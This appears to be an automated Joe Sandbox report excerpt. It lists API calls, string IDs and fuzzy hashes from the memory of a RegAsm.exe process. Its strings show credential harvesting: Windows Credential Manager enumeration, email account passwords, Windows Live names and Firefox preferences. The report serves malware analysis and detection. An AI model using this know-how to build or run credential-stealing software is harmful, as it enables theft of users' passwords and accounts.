                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409C6F
                                                                                                                                                                                                • memcpy.MSVCRT(?,0wE,00000014), ref: 00409C97
                                                                                                                                                                                                • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014), ref: 00409CB4
                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D3D
                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D47
                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D7F
                                                                                                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                                • String ID: 0wE$d
                                                                                                                                                                                                • API String ID: 2915808112-1552800882
                                                                                                                                                                                                • Opcode ID: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                                                                                                • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                                                                                                • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                                                                • strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                                • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                                • API String ID: 1348940319-1729847305
                                                                                                                                                                                                • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                                • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                                                                • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                                                                • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                                                                • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                                                                                                • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                                • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                                                                • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                                • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405E80
                                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00405E98
                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 00405E9B
                                                                                                                                                                                                  • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
                                                                                                                                                                                                  • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
                                                                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405EA7
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 00405EBE
                                                                                                                                                                                                • GetDlgItem.USER32(?,00000000), ref: 00405ED0
                                                                                                                                                                                                • GetDlgItem.USER32(?,00000000), ref: 00405EE2
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 00405EF0
                                                                                                                                                                                                • SetFocus.USER32(00000000), ref: 00405EF3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2432066023-0
                                                                                                                                                                                                • Opcode ID: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                                • Instruction ID: 6786727c0aa7fef6bca0c81d499308ec00879f235530f9e7c86c655f771e1d73
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                                • Instruction Fuzzy Hash: B801A571500305EFDB116F76DC8AF6BBFACEF81755F05442AB4049B191CBB8E8018A28
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                                • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                                • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                                • API String ID: 945165440-3589380929
                                                                                                                                                                                                • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                                • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                                                                                                • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                                • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004094C8
                                                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                                                • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                                                • memset.MSVCRT ref: 0040950C
                                                                                                                                                                                                • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                                                • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                                • String ID: sysdatetimepick32
                                                                                                                                                                                                • API String ID: 3411445237-4169760276
                                                                                                                                                                                                • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                                                                • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                                                                • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Library$FreeLoad
                                                                                                                                                                                                • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                                • API String ID: 534179979-4258758744
                                                                                                                                                                                                • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                                • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                                                                                                  • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                                                                                                  • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                                                                                                  • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Item$DialogMessageSend
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2485852401-0
                                                                                                                                                                                                • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                                • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                                                                                                                • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                                • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                                                • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                                                • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                                                • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                                                • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3642520215-0
                                                                                                                                                                                                • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                                • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2313361498-0
                                                                                                                                                                                                • Opcode ID: c0fd86ac5231b126ca71dbcda0134e8e863c460558ef4c97bad657530ca58ccb
                                                                                                                                                                                                • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                                                                                                                                • Opcode Fuzzy Hash: c0fd86ac5231b126ca71dbcda0134e8e863c460558ef4c97bad657530ca58ccb
                                                                                                                                                                                                • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                                                                                                • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2126104762-0
                                                                                                                                                                                                • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                                • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008,?,?,?,?,?,?,004012E4,?), ref: 0040730D
                                                                                                                                                                                                • GetDeviceCaps.GDI32(004012E4,0000000A,?,?,?,?,?,?,004012E4,?), ref: 00407316
                                                                                                                                                                                                • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                                • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                                • MoveWindow.USER32(004012E4,?,?,?,?,00000001), ref: 00407371
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1999381814-0
                                                                                                                                                                                                • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                                • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                                • API String ID: 1297977491-3883738016
                                                                                                                                                                                                • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                • String ID: gj
                                                                                                                                                                                                • API String ID: 438689982-4203073231
                                                                                                                                                                                                • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                                                                • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: __aulldvrm$__aullrem
                                                                                                                                                                                                • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                                                                                                • API String ID: 643879872-978417875
                                                                                                                                                                                                • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                                                                • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                                                                                                                • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                                                                • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                • memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                                • String ID: user_pref("
                                                                                                                                                                                                • API String ID: 765841271-2487180061
                                                                                                                                                                                                • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                                                                                                • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                                                                                                                • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                                • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                                • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                                • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                                • memset.MSVCRT ref: 004058C3
                                                                                                                                                                                                • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                                                • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4281309102-0
                                                                                                                                                                                                • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                                • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
